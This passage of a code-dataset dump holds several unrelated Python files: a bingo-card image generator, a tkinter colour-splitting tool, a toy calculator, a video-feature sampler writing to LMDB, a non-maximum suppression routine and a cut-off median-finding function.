presets:\n print(\"Please try again\")\n continue\n break\n\n free = True\n print(\"Type 'no' if you would like to exclude the free space\")\n if input() == \"no\":\n free = False\n\n print(\"How many columns and rows should there be?\")\n size = int(input())\n\n print(\"What is the name on the card?\")\n name = input()\nelse:\n response = \"e3\"\n type = presets[response][\"type\"]\n color = presets[response][\"color\"]\n namecolor = presets[response][\"namecolor\"]\n free = True\n size = 5\n name = \"ram\"\n\nprint(\"Card printing imminently...\")\n\n\n#functions\ndef make_shadow_box(width,height,toplight,bottomlight):\n border_edges_image = Image.new(\"RGBA\", (width, height), \"#0000\")\n draw = ImageDraw.Draw(border_edges_image)\n draw.polygon([\n (0,0),(border_size,border_size),(border_size,height-border_size),(0,height)\n ],fill=toplight)\n draw.polygon([\n (0,0),(border_size,border_size),(width-border_size,border_size),(width,0)\n ],fill=toplight)\n draw.polygon([\n (width,0),(width,height),(width-border_size,height-border_size),(width-border_size,border_size)\n ],fill=bottomlight)\n draw.polygon([\n (0,height),(border_size,height-border_size),(width-border_size,height-border_size),(width,height)\n ],fill=bottomlight)\n return border_edges_image\n\nt_start = perf_counter()\n\n#get assets\nif free:\n with Image.open(\"assets/\" + type + \"_free.png\") as freespace:\n freespace.convert(\"RGBA\")\nwith Image.open(\"assets/\"+type+\"_logo.png\") as logo:\n logo.convert(\"RGBA\")\n\nprint(\"Checkpoint 1\", perf_counter()-t_start)\nt_start = perf_counter()\n\n#calculate and create background at size\nwidth = size * (margins_size + cells_size) + margins_size\nif margins_size * 2 + logo.width > width:\n width = margins_size * 2 + logo.width\nimage = Image.new(\"RGBA\", (width, size * (margins_size + cells_size) + margins_size * 3 + logo.height + name_line_size), color)\n\n#create highlighted border edges\nimage.alpha_composite(\n make_shadow_box(\n image.width,\n image.height,\n (255,255,255,highlight_opacity),\n (0,0,0,shadow_opacity)\n )\n)\n\nprint(\"Checkpoint 2\", 
perf_counter()-t_start)\nt_start = perf_counter()\n\n#draw logo\nimage.alpha_composite(logo,(math.floor(image.width/2 - logo.width / 2),margins_size),(0,0))\n\ndef get_card(path):\n im = Image.open(\"cards/\" + path).convert(\"RGBA\")\n\n #resize the image\n if im.width > im.height:\n box=(\n math.floor(im.width/2-im.height/2),\n 0,\n math.floor(im.width/2+im.height/2),\n im.height\n )\n else:\n box=(\n 0,\n math.floor(im.height/2-im.width/2),\n im.width,\n math.floor(im.height/2+im.width/2)\n )\n im = im.crop(box).resize((cells_size,cells_size))\n \n #give it a shadowbox\n im.alpha_composite(\n make_shadow_box(\n im.width,\n im.height,\n (0,0,0,celltop_opacity),\n (0,0,0,cellbottom_opacity)\n )\n )\n\n name = os.path.splitext(path)[0]\n\n #add text to the image\n font = ImageFont.truetype(\"LemonMilk.otf\", 30)\n words = '\\n'.join(textwrap.wrap(name,letters_per_line))\n draw = ImageDraw.Draw(im)\n draw.text((border_size,0),words,font=font, fill=(0,0,0))\n draw.text((border_size+2,0),words,font=font, fill=(0,0,0))\n draw.text((border_size,2),words,font=font, fill=(0,0,0))\n draw.text((border_size+2,2),words,font=font, fill=(0,0,0))\n draw.text((border_size+1,1),words,font=font, fill=(255,255,255))\n\n return im\n\n#get images and crop\ncards = listdir(\"cards/\")\nrandom.shuffle(cards)\ncards_array = []\nfor index,value in enumerate(cards):\n if free and math.floor((size*size)/2) == index:\n cards_array.append(freespace)\n cards_array.append(get_card(value))\n\nprint(\"Checkpoint 3\", perf_counter()-t_start)\nt_start = perf_counter()\n\nfor index,value in enumerate(cards_array):\n if (index>=size*size):\n break\n \n image.paste(\n value,\n (\n math.floor(image.width / 2 - (size * cells_size + (size - 1) * margins_size)/2 + ((index % size) * cells_size + ((index % size) ) * margins_size) + cells_size/2 - value.width/2),\n math.floor(index/size) * (margins_size + cells_size) + margins_size * 2 + logo.height + math.floor(cells_size / 2 - value.height / 2)\n ),\n value\n )\n\nprint(\"Checkpoint 4\", perf_counter()-t_start)\nt_start = perf_counter()\n\n#write name at the bottom of the card\nfont = ImageFont.truetype(\"SylexiadSansMedium-Bold.otf\", 270)\ndraw = ImageDraw.Draw(image)\ndraw.text(\n (\n margins_size,\n image.height-margins_size-math.floor(name_line_size*1.25)\n ),\n name,font=font,fill=namecolor\n)\n\nprint(\"Checkpoint 5\", perf_counter()-t_start)\n\n#size * (margins_size + cells_size) + margins_size * 2 + logo.height)\n#save image\nimage.save(\"bingo_out.png\")\nprint(\"Card printing complete, please read your files\")\n","repo_name":"DenowRammy/BingoCards","sub_path":"bingo.py","file_name":"bingo.py","file_ext":"py","file_size_in_byte":6091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"30026967281","text":"import tkinter as tk\r\nfrom tkinter import ttk\r\nfrom tkinter import filedialog\r\nfrom tkinter import StringVar\r\nimport os\r\n\r\nfrom PIL import Image\r\nimport matplotlib.image as mimg\r\n\r\n#External file import#########################################################################\r\ntry:\r\n from LoadMessages import * \r\n \r\nexcept ImportError:\r\n print('dependent file import error')\r\n raise SystemExit\r\n#############################################################################################\r\n\r\nclass ImageRGB(tk.Frame):\r\n def IndividualRGB(self):\r\n topRGB = tk.Toplevel(self)\r\n topRGB.title(\"Creating individual images from RGB sets\")\r\n topRGB.geometry(\"900x140\")\r\n \r\n 
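# [Editor's note — the outlined-text effect that get_card above builds with
# five offset draw.text calls can also be done with Pillow's stroke options
# (Pillow >= 6.2); this standalone sketch uses the bundled default font.]
from PIL import Image, ImageDraw, ImageFont

img = Image.new("RGBA", (400, 80), "#222222")
draw = ImageDraw.Draw(img)
font = ImageFont.load_default()
draw.text((10, 30), "outlined label", font=font, fill="white",
          stroke_width=2, stroke_fill="black")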
#Set variable input, output path string & operation done text\r\n FileInput = StringVar()\r\n FolderOutput = StringVar()\r\n RGBRun = StringVar()\r\n self.OType = tk.IntVar(0)\r\n \r\n def AskInput(self):\r\n file_selected = filedialog.askopenfile()\r\n topRGB.lift()\r\n try:\r\n FileInput.set(file_selected.name)\r\n except:\r\n FileInput.set('')\r\n\r\n def AskOutput(self):\r\n folder_selected = filedialog.askdirectory()\r\n topRGB.lift() \r\n folder_selected = folder_selected + \"/\"\r\n FolderOutput.set(folder_selected)\r\n \r\n def OpenRGB(OType,IFile,OPath): \r\n #OPENRGB #########################################################\r\n list_RGB = None\r\n im = None\r\n width = None\r\n height = None\r\n \r\n if (os.path.isfile(IFile)==False or os.path.isdir(OPath)==False):\r\n RunErrorIO(RGBRun)\r\n elif IFile.endswith(\".png\")==False:\r\n RunNotPNG(RGBRun)\r\n else:\r\n RunOn(RGBRun)\r\n \r\n try:\r\n im = Image.open(IFile) #your image\r\n im = im.convert('RGB')\r\n \r\n width = im.size[0] #define W and H\r\n height = im.size[1]\r\n \r\n list_RGB = []\r\n \r\n for x in range(width):\r\n for y in range(height):\r\n RGB = im.getpixel((x,y))\r\n \r\n if RGB not in list_RGB:\r\n list_RGB.append(RGB)\r\n except:\r\n RunErrorLoad(RGBRun)\r\n \r\n LoadRGB(list_RGB,im,width,height,OType,OPath)\r\n \r\n def LoadRGB(list_RGB,im,width,height,OType,OPath):\r\n #LOADRGB #################################################\r\n if OType==0:\r\n RunOptionUnavailable(RGBRun)\r\n elif OType==1:\r\n im_new=[]\r\n for i in range(0,len(list_RGB)):\r\n im_new.append(i)\r\n \r\n for colors in range(0,len(list_RGB)): \r\n im_new[colors] = Image.new('RGB',(width,height))\r\n i=0\r\n \r\n for x in range(width):\r\n for y in range(height):\r\n \r\n if im.getpixel((x,y))==list_RGB[colors]:\r\n im_new[colors].putpixel((x,y),list_RGB[colors])\r\n else:\r\n pass\r\n #im_new[colors].putpixel((x,y),(255,255,255))\r\n \r\n #Save 1 file for each different color in hex or RGB\r\n try:\r\n mimg.imsave(OPath + '-'.join(map(str,list_RGB[colors])) + \".png\", im_new[colors])\r\n except: \r\n RunErrorSave(RGBRun)\r\n break\r\n \r\n RunFinish(RGBRun)\r\n ############################################################\r\n \r\n RunStart(RGBRun)\r\n\r\n\r\n#FORMATING##############################################################################################################\r\n\r\n #Buttons to load input/output folders, set label to empty\r\n buttonInput= ttk.Button(topRGB, text=\"Select input file\",command=lambda: [AskInput(self),RunStart(RGBRun)])\r\n buttonOutput= ttk.Button(topRGB, text=\"Select output path\",command=lambda: [AskOutput(self),RunStart(RGBRun)])\r\n \r\n rbSingleColor = ttk.Radiobutton(topRGB,text=\"Export a single color\",variable=self.OType,value=0,command=lambda:RunStart(RGBRun))\r\n rbAllColors = ttk.Radiobutton(topRGB,text=\"Export all colors\",variable=self.OType,value=1,command=lambda:RunStart(RGBRun))\r\n \r\n #Input/output paths chosen\r\n #Text in front of input / output paths chosen\r\n SaveInput = ttk.Label(topRGB, textvariable=FileInput)\r\n SaveOutput = ttk.Label(topRGB, textvariable=FolderOutput)\r\n SaveTextI = ttk.Label(topRGB, text=\"INPUT FILE:\")\r\n SaveTextO = ttk.Label(topRGB, text=\"OUTPUT PATH:\")\r\n \r\n #Run tool with selected directories\r\n buttonRunRGB = ttk.Button(topRGB, text=\"Run tool\",command=lambda: [RunStart(RGBRun),OpenRGB(self.OType.get(),FileInput.get(),FolderOutput.get())])\r\n \r\n #Variable label based on status of tool\r\n RGBRunText = ttk.Label(topRGB, 
textvariable=RGBRun)\r\n        #Exit button for topRGB\r\n        buttonExit = ttk.Button(topRGB, text=\"Exit\", command=lambda: topRGB.destroy())\r\n        \r\n        #Setting default column widths for topRGB\r\n        topRGB.grid_columnconfigure(1, minsize=100)\r\n        topRGB.grid_columnconfigure(2, minsize=100)\r\n        topRGB.grid_columnconfigure(3, minsize=400)\r\n        \r\n        #Placing widgets on topRGB frame\r\n        buttonInput.grid(sticky='NSEW',row=0,column=0)\r\n        buttonOutput.grid(sticky='NSEW',row=1,column=0)\r\n        SaveTextI.grid(sticky='E',row=0, column=1)\r\n        SaveTextO.grid(sticky='E',row=1, column=1)\r\n        SaveInput.grid(sticky='W',row=0, column=2)\r\n        SaveOutput.grid(sticky='W',row=1, column=2)\r\n        rbSingleColor.grid(sticky='NSEW',row=2,column=0)\r\n        rbAllColors.grid(sticky='NSEW',row=3,column=0)\r\n        \r\n        buttonRunRGB.grid(sticky='NSEW',row=5,column=0)\r\n        RGBRunText.grid(sticky='NSEW',row=5, column=1,columnspan=3)\r\n        buttonExit.grid(sticky='NSEW',row=5,column=4)","repo_name":"Mapl3Sn0w/CryptoGUI","sub_path":"ImageRGB.py","file_name":"ImageRGB.py","file_ext":"py","file_size_in_byte":6672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"72516561074","text":"import operator\n\nnum1 = 5\nnum2 = 3\ntotal = num1 + num2  # renamed from 'sum' to avoid shadowing the built-in\nprint(str(num1) + \"+\" + str(num2) + \"=\" + str(total))\n\nnum3 = int(input())\nnum4 = int(input())\nsum2 = num3 + num4\nprint(str(num3) + \"+\" + str(num4) + \"=\" + str(sum2))\nnumber1 = int(input(\"first number\"))\nanswer = input(\"choose a=add b=subtract c=multiply d=divide\")\nnumber2 = int(input(\"second number\"))\n# look up the chosen operation; the original added int + str + int, which raises a TypeError\nops = {\"a\": operator.add, \"b\": operator.sub, \"c\": operator.mul, \"d\": operator.truediv}\nanswer2 = ops[answer](number1, number2)\nprint(str(number1) + answer + str(number2) + \"=\" + str(answer2))\n\n","repo_name":"artiamus/artiam","sub_path":"print (1 + 7).py","file_name":"print (1 + 7).py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"26243842592","text":"import os\nimport sys\nfrom PIL import Image\nimport six\nimport string\nimport numpy as np\nimport lmdb\nimport pickle\nimport tqdm\nimport pyarrow as pa\nimport pandas as pd\nimport torch\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\nimport json\nfrom collections import namedtuple\nSegment = namedtuple('Segment', ['video', 'start', 'end', 'label'])\n\"\"\"\nkey\tvalue\nseq-id1\t(feature_seq1, label_seq1)\nseq-id2\t(feature_seq2, label_seq2)\nseq-id3\t(feature_seq3, label_seq3)\n\"\"\"\ndef dumps_pyarrow(obj):\n\t\"\"\"\n\tSerialize an object.\n\tReturns:\n\t\tImplementation-dependent bytes-like object\n\t\"\"\"\n\treturn pa.serialize(obj).to_buffer()\n# data balancing is only applied to the training set.\nclass balancing_sampler(object):\n\tdef __init__(self, input_dir, output_path, json_file,\n\t\ttarget_num_seqs = 4732, target_length_seq = 20, \n\t\tmedian_class_duration = 23659):\n\t\t\"\"\"\n\t\tinput_dir: directory containing training .npy features\n\t\toutput_path: lmdb file path to be saved\n\t\tjson_file: training set annotations\n\t\ttarget_num_seqs: for each label, we sample # sequences\n\t\ttarget_length_seq: for each sequence, the length is # in seconds\n\t\tmedian_class_duration: the label with median duration, which is 23659 seconds\n\t\t\"\"\"\n\t\tself.input_dir = input_dir # input directory of the .npy features\n\t\tself.output_path = output_path # lmdb file path\n\t\tself.json_file = json_file\n\t\t# the median class is xiyan, the number of sequences to be sampled is 4,732\n\t\t# the sequence length is 5s, 150 
frames\n\t\tself.target_num_seqs = target_num_seqs\n\t\tself.target_length_seq = target_length_seq\n\t\tself.median_class_duration = median_class_duration # in seconds\n\t\twith open(self.json_file) as f:\n\t\t\tself.data = json.loads(f.readlines()[0])\n\t\tself.frame_rate = 15. # 15 frames per second \n\t\tself.define_downsample_oversample_groups()\n\n\tdef define_downsample_oversample_groups(self):\n\t\tdata = self.data\n\t\tvideo_ids = data.keys()\n\t\tsegment_label_durati = {}\n\t\tself.segment_list = []\n\t\tself.segment_dict = {}\n\t\tself.sid_2_same_vid_sids = []\n\t\tsid = 0\n\t\tfor vid in tqdm(video_ids):\n\t\t\tsegments = data[vid]\n\t\t\tannotations = segments['annotations']\n\t\t\tfor annot in annotations:\n\t\t\t\tlabel = annot['label']\n\t\t\t\tif label not in segment_label_durati.keys():\n\t\t\t\t\tsegment_label_durati[label] = 0\n\t\t\t\tdura = annot['segment'][1] - annot['segment'][0]\n\t\t\t\tassert dura >=0, \"invalid segment!\"\n\t\t\t\tsegment_label_durati[label] += dura\n\t\t\t\tsegment = Segment(video = vid, start = annot['segment'][0],\n\t\t\t\t\tend = annot['segment'][1], label = label)\n\t\t\t\tif label not in self.segment_dict.keys():\n\t\t\t\t\tself.segment_dict[label] = []\n\t\t\t\tself.segment_list.append(segment)\n\t\t\t\tself.segment_dict[label].append(sid)\n\t\t\t\tsid +=1\n\t\t\tlen_segs = len(annotations)\n\t\t\tfor i in range(len_segs):\n\t\t\t\tstart = sid - len_segs\n\t\t\t\tlist_ids = np.arange(len_segs).tolist()\n\t\t\t\tlist_ids.remove(i)\n\t\t\t\tif list_ids is None or len(list_ids)==0:\n\t\t\t\t\tsame_vid_sids = list()\n\t\t\t\telse:\n\t\t\t\t\tsame_vid_sids = [i+start for i in list_ids]\n\t\t\t\tself.sid_2_same_vid_sids.append(same_vid_sids)\n\t\tassert len(self.sid_2_same_vid_sids) == len(self.segment_list)\n\t\td_group = []\n\t\to_group = []\n\t\tself.label_list = sorted(segment_label_durati.keys())\n\t\tfor label in self.label_list:\n\t\t\tif segment_label_durati[label] < self.median_class_duration:\n\t\t\t\to_group.append(label)\n\t\t\telse:\n\t\t\t\td_group.append(label)\n\t\tself.downsample_labels = d_group\n\t\tself.oversample_labels = o_group\n\n\tdef sample_sequences(self, write_frequency=5000):\n\t\tprint(\"Generate LMDB to %s\" % self.output_path)\n\t\tisdir = os.path.isdir(self.output_path)\n\t\tdb = lmdb.open(self.output_path, subdir=isdir,\n\t\t\t\t\t map_size=1099511627776 * 2, readonly=False,\n\t\t\t\t\t meminit=False, map_async=True)\n\n\t\ttxn = db.begin(write=True)\n\t\ti_seq = 0\n\t\tfor i_label, label in enumerate(self.label_list):\n\t\t\tsegment_ids = self.segment_dict[label]\n\t\t\tsame_video_segment_ids = [self.sid_2_same_vid_sids[i] for i in segment_ids]\n\t\t\tif label in self.downsample_labels:\n\t\t\t\tsample_weights = self.random_sample_weights(segment_ids, same_video_segment_ids)\n\t\t\t\tsampled_ids = np.random.choice(np.arange(len(segment_ids)), self.target_num_seqs, p = sample_weights)\n\t\t\t\tfor i, id in enumerate(sampled_ids):\n\t\t\t\t\tsid = segment_ids[id]\n\t\t\t\t\tsegment = self.segment_list[sid]\n\t\t\t\t\tsame_sid = same_video_segment_ids[id]  # must be assigned before it is used below\n\t\t\t\t\tvideo_segment_list = [self.segment_list[id] for id in same_sid]\n\t\t\t\t\tsequence_id = \"{}_{}\".format(segment.video, sid)\n\t\t\t\t\tfeature_seq, label_seq = self.sample_one_segment(segment, video_segment_list)\n\t\t\t\t\ttxn.put(u'{}'.format(i_seq).encode('ascii'), dumps_pyarrow((feature_seq, label_seq )))\n\t\t\t\t\ti_seq +=1\n\t\t\t\t\tprint(\"[{}/{}] Label {} sampling : [{}/{}]\".format(i_label, len(self.label_list), label, i, 
self.target_num_seqs),end='\\r')\n\t\t\t\t\tif i_seq % write_frequency == 0:\n\t\t\t\t\t\ttxn.commit()\n\t\t\t\t\t\ttxn = db.begin(write=True)\n\t\t\t\t\tdel feature_seq, label_seq\n\t\t\telse:\n\t\t\t\tfor i, (sid, same_sid) in enumerate(zip(segment_ids, same_video_segment_ids)):\n\t\t\t\t\tsegment = self.segment_list[sid]\n\t\t\t\t\tvideo_segment_list = [self.segment_list[id] for id in same_sid]\n\t\t\t\t\tsequence_id = \"{}_{}\".format(segment.video, sid)\n\t\t\t\t\tfeature_seq, label_seq = self.sample_one_segment(segment, video_segment_list)\n\t\t\t\t\ttxn.put(u'{}'.format(i_seq).encode('ascii'), dumps_pyarrow((feature_seq, label_seq )))\n\t\t\t\t\ti_seq +=1\n\t\t\t\t\tif i_seq % write_frequency == 0:\n\t\t\t\t\t\ttxn.commit()\n\t\t\t\t\t\ttxn = db.begin(write=True)\n\t\t\t\t\tdel feature_seq, label_seq\n\t\t\t\t\tprint(\"[{}/{}] Label {} sampling : [{}/{}]\".format(i_label, len(self.label_list), label, i, self.target_num_seqs),end='\\r')\n\t\t\t\t\tif i == self.target_num_seqs - 1:\n\t\t\t\t\t\tbreak\n\t\t\t\tif i + 1 < self.target_num_seqs:\n\t\t\t\t\tN = self.target_num_seqs - (i+1)\n\t\t\t\t\tsample_weights = self.random_sample_weights(segment_ids, same_video_segment_ids)\n\t\t\t\t\tsampled_ids = np.random.choice(np.arange(len(segment_ids)), N, p = sample_weights)\n\t\t\t\t\tfor id in sampled_ids:\n\t\t\t\t\t\tsid = segment_ids[id]\n\t\t\t\t\t\tsame_sid = same_video_segment_ids[id]\n\t\t\t\t\t\tsegment = self.segment_list[sid]  # re-derive for the newly sampled id instead of reusing stale loop variables\n\t\t\t\t\t\tvideo_segment_list = [self.segment_list[id] for id in same_sid]\n\t\t\t\t\t\tsequence_id = \"{}_{}\".format(segment.video, sid)\n\t\t\t\t\t\tfeature_seq, label_seq = self.sample_one_segment(segment, video_segment_list)\n\t\t\t\t\t\ttxn.put(u'{}'.format(i_seq).encode('ascii'), dumps_pyarrow((feature_seq, label_seq )))\n\t\t\t\t\t\ti_seq +=1\n\t\t\t\t\t\tif i_seq % write_frequency == 0:\n\t\t\t\t\t\t\ttxn.commit()\n\t\t\t\t\t\t\ttxn = db.begin(write=True)\n\t\t\t\t\t\tdel feature_seq, label_seq\n\t\t\t\t\t\ti+=1\n\t\t\t\t\t\tprint(\"[{}/{}] Label {} sampling : [{}/{}]\".format(i_label, len(self.label_list), label, i, self.target_num_seqs),end='\\r')\n\t\tprint(\"All labels are sampled.\")\n\t\t# finish iterating \n\t\ttxn.commit()\n\t\tkeys = [u'{}'.format(k).encode('ascii') for k in range(i_seq)]  # i_seq entries were written, keys 0 .. i_seq-1\n\t\twith db.begin(write=True) as txn:\n\t\t\ttxn.put(b'__keys__', dumps_pyarrow(keys))\n\t\t\ttxn.put(b'__len__', dumps_pyarrow(len(keys)))\n\t\tprint(\"Database saved to %s\"%self.output_path)\n\t\tdb.sync()\n\t\tdb.close()\n\n\tdef random_sample_weights(self, segment_ids, same_video_segment_ids):\n\t\tweights = [1/float(len(ids)+1) for ids in same_video_segment_ids]\n\t\treturn np.array(weights)/np.sum(np.array(weights))\n\tdef downsample(self, segments):\n\t\tlen_segs = len(segments)\n\n\tdef sample_one_segment(self, input_segment, video_segment_list):\n\t\tvideo = input_segment.video\n\t\tlabel = input_segment.label\n\t\tnpy_fpath = os.path.join(self.input_dir, '%s.npy'%video)\n\t\ttarget_length = int(self.target_length_seq * self.frame_rate) #10 * 15 = 150\n\t\ttarget_length = self.frame_length_to_feature_length(target_length) #floor(150/8)\n\t\ttry:\n\t\t\tfeature = np.load(npy_fpath)\n\t\texcept:\n\t\t\traise ValueError(\"{} does not exist!\".format(npy_fpath))\n\t\tmaximum_f_id = feature.shape[0]\n\t\tif maximum_f_id <= target_length:\n\t\t\tN = target_length - maximum_f_id\n\t\t\tif N == 0:\n\t\t\t\tfeature_ids = np.arange(maximum_f_id)\n\t\t\telse:\n\t\t\t\tfeature_ids = np.concatenate([np.arange(maximum_f_id), np.array([maximum_f_id-1]*N).astype(np.int)])\n\t\t\tfeature_seq = feature[feature_ids,:]\n\t\t\tx = self.label_list.index(label)\n\t\t\tlabel_seq = 
np.eye(len(self.label_list))[np.ones(target_length).astype(np.int)*x]\n\t\telse:\n\t\t\tsampled_start, sampled_end = self.randomly_select_seq_range(input_segment.start, input_segment.end,\n\t\t\t\tmaximum = maximum_f_id)\n\n\t\t\tif sampled_end - sampled_start + 1 != target_length:\n\t\t\t\tN = target_length - (sampled_end - sampled_start + 1)\n\t\t\t\tif N < 0:\n\t\t\t\t\tsampled_end = sampled_end + N\n\t\t\t\t\tfeature_ids = np.arange(sampled_start, sampled_end+1)\n\t\t\t\telse:\n\t\t\t\t\tif sampled_end == maximum_f_id - 1:\n\t\t\t\t\t\tfeature_ids = np.concatenate([np.arange(sampled_start, sampled_end+1), np.array([maximum_f_id - 1]*N).astype(np.int)])\n\t\t\t\t\telif sampled_start == 0:\n\t\t\t\t\t\tfeature_ids = np.concatenate([np.zeros(N).astype(np.int), np.arange(sampled_start, sampled_end+1)])\n\t\t\t\t\telse:\n\t\t\t\t\t\tfeature_ids = np.concatenate([np.arange(sampled_start, sampled_end+1), np.array([sampled_end]*N).astype(np.int)])\n\t\t\telse:\n\t\t\t\tfeature_ids = np.arange(sampled_start, sampled_end + 1)\n\t\t\tfeature_seq = feature[feature_ids,:]\n\t\t\tx = self.label_list.index(label)\n\t\t\tlabel_seq = np.eye(len(self.label_list))[np.ones(target_length).astype(np.int)*x]\n\t\t\tout_of_range = feature_ids < self.second_2_id(input_segment.start)\n\t\t\tlabel_seq[out_of_range] = np.zeros_like(label_seq[out_of_range])\n\t\t\tout_of_range = feature_ids > self.second_2_id(input_segment.end)\n\t\t\tlabel_seq[out_of_range] = np.zeros_like(label_seq[out_of_range])\n\t\tlabel_seq = self.detect_mutiple_labels(label_seq, feature_ids, video_segment_list)\n\t\tlabel_seq = np.clip(label_seq, 0, 1)\n\t\treturn feature_seq, label_seq \n\t\n\tdef detect_mutiple_labels(self, label_seq, input_feature_range, video_segment_list):\n\t\tif len(video_segment_list) == 0:\n\t\t\treturn label_seq\n\t\tfor segment in video_segment_list:\n\t\t\tstart, end = segment.start, segment.end\n\t\t\tsegment_feature_range = np.arange(self.second_2_id(start), self.second_2_id(end)+1)\n\t\t\tintersection, intersection_id, _ = np.intersect1d(input_feature_range, segment_feature_range, return_indices=True)\n\t\t\tif len(intersection) == 0:\n\t\t\t\treturn label_seq\n\t\t\telse:\n\t\t\t\tN = len(intersection)\n\t\t\t\tnew_label = self.label_list.index(segment.label)\n\t\t\t\tnew_label = np.eye(len(self.label_list))[np.ones(N).astype(np.int)*new_label]\n\t\t\t\tlabel_seq[intersection_id] = label_seq[intersection_id] + new_label\n\t\t\t\treturn label_seq\n\n\tdef randomly_select_seq_range(self, start, end, maximum):\n\t\ttarget_length = int(self.target_length_seq * self.frame_rate) #10 * 15 = 150\n\t\ttarget_length = self.frame_length_to_feature_length(target_length) #floor(150/8)\n\t\tsearch_ids = np.arange(self.second_2_id(start), self.second_2_id(end)+1)\n\t\tsampled_middle = np.random.choice(search_ids, 1)[0]\n\t\tnew_start = sampled_middle - target_length // 2\n\t\tnew_end = sampled_middle + target_length // 2 - 1\n\t\tif new_start <0:\n\t\t\tnew_start = 0\n\t\t\tnew_end = new_start + target_length - 1\n\t\tif new_end > maximum - 1:\n\t\t\tnew_end = maximum - 1\n\t\t\tnew_start = new_end - target_length + 1\n\t\treturn max(0, new_start), min(new_end, maximum-1)\n\t\t\n\tdef second_2_id(self, input_time):\n\t\tframe_id = input_time*self.frame_rate\n\t\tfeature_id = self.frame_length_to_feature_length(frame_id)\n\t\treturn feature_id - 1\n\tdef id_2_second(self, input_feature_id):\n\t\tinput_frame_id_min, input_frame_id_max = self.feature_length_to_frame_length(input_feature_id+1)\n\t\ttime = 
(input_frame_id_min+input_frame_id_max)*0.5/self.frame_rate\n\t\treturn time\n\tdef feature_length_to_frame_length(self, N):\n\t\treturn int(N*8), int((N+1)*8)\n\tdef frame_length_to_feature_length(self, T):\n\t\treturn int(np.floor(T/8))\n\nif __name__=='__main__':\n\tsampler = balancing_sampler(input_dir = '../../data/Train/i3d_features',\n\t\toutput_path = '../../user_data/Train/i3d_features.lmdb',\n\t\tjson_file = '../../data/Train/train_annotations.json')\n\tsampler.sample_sequences()\n\n\tsave_label_list = \"../../user_data/label_list.txt\"\n\twith open(save_label_list, 'w') as out:\n\t\tout.write(\",\".join(sampler.label_list))\n\t\n\n\n\n","repo_name":"wtomin/video_event_detection_2020_submission","sub_path":"code/data_balancing_sampler/sampler.py","file_name":"sampler.py","file_ext":"py","file_size_in_byte":11733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"26984297435","text":"import numpy as np\n\ndef non_maximum_suppression(scores, num_proposals, iou_thresholds, bounding_box_coordinates):\n \"\"\"\n Input Parameters:\n 1.\tscores: A numpy array containing confidence scores for each bounding box proposal. \n Each row represents a proposal, and there's a single confidence score associated with it.\n 2.\tnum_proposals: An integer representing the desired number of retained proposals after applying NMS.\n 3.\tiou_thresholds: A threshold value representing the Intersection over Union (IoU) overlap threshold. If two bounding boxes have an IoU greater than this threshold, one of them will be suppressed.\n 4.\tbounding_box_coordinates: A numpy array containing the coordinates of bounding box proposals. \n Each row represents a proposal, and columns 1 to 4 represent the (x1, y1, x2, y2) coordinates of the bounding box, while the last column (index 5) contains the index of the proposal.\n Post-processing:\n If the loop completes without selecting the desired number of proposals, the last selected proposal is added repeatedly until the desired count is reached.\n Output: \n The function returns a numpy array containing the indices of the selected proposals after NMS.\n \n \"\"\" \n if not (isinstance(scores, np.ndarray) and len(scores.shape) == 2 and scores.shape[1] == 1):\n raise TypeError('scores array is not in the correct format')\n\n num_windows = scores.shape[0]\n indexed_coordinates = np.concatenate((scores, bounding_box_coordinates), axis=1)\n\n indices = np.argsort(indexed_coordinates[:, 0])\n indexed_coordinates_with_indices = np.concatenate((indexed_coordinates, np.arange(0, num_windows).reshape(num_windows, 1)), axis=1)[indices]\n selected_indices = []\n\n remaining_windows = indexed_coordinates_with_indices\n\n while remaining_windows.any():\n current_window = remaining_windows[-1]\n selected_indices.append(current_window[5])\n\n if len(selected_indices) == num_proposals:\n return np.array(selected_indices).reshape(1, num_proposals).astype(np.int64)\n \n remaining_windows = remaining_windows[:-1]\n\n start_max = np.maximum(remaining_windows[:, 1:3], current_window[1:3])\n end_min = np.minimum(remaining_windows[:, 3:5], current_window[3:5])\n lengths = end_min - start_max + 1\n intersection_area = lengths[:, 0] * lengths[:, 1]\n intersection_area[np.logical_or(lengths[:, 0] < 0, lengths[:, 1] < 0)] = 0\n iou_map_current = intersection_area / (\n (remaining_windows[:, 3] - remaining_windows[:, 1] + 1) * \n (remaining_windows[:, 4] - remaining_windows[:, 2] + 1) +\n (current_window[3] - current_window[1] + 1) * \n 
(current_window[4] - current_window[2] + 1) - intersection_area)\n \n remaining_windows = remaining_windows[iou_map_current <= iou_thresholds]\n\n while len(selected_indices) != num_proposals:\n selected_indices.append(current_window[5])\n\n return np.array(selected_indices).reshape(1, -1).astype(np.int64)\n","repo_name":"MAXNORM8650/MSFM","sub_path":"models/modified_NMS.py","file_name":"modified_NMS.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"34283469793","text":"from typing import List\n\n\nclass Array:\n\n def find_median(self, nums1: List[int], nums2: List[int]) -> float:\n \"\"\"\n Approach: Binary Search\n Time Complexity: O(log(min(m,n)))\n Space Complexity: O(1)\n :param nums1:\n :param nums2:\n :return:\n \"\"\"\n if len(nums1) > len(nums2):\n nums1, nums2 = nums2, nums1\n\n x, y = len(nums1), len(nums2)\n\n left, right = 0, x\n\n while left <= right:\n\n pX = left + (right - left) // 2\n pY = (x + y + 1) // 2 - pX\n\n l1 = float(\"-inf\") if pX == 0 else nums1[pX - 1]\n r1 = float(\"inf\") if pX == x else nums1[pX]\n\n l2 = float(\"-inf\") if pY == 0 else nums2[pY - 1]\n r2 = float(\"inf\") if pY == y else nums2[pY]\n\n if l1 > r2:\n right = pX - 1\n elif l2 > r1:\n left = pX + 1\n else:\n if (x + y) % 2 == 1: # odd\n return max(l1, l2)\n else:\n return (max(l1, l2) + min(r1, r2)) / 2.0\n\n\nif __name__ == \"__main__\":\n\n array = Array()\n print(array.find_median([1, 3], [2]))\n print(array.find_median([1, 2], [3, 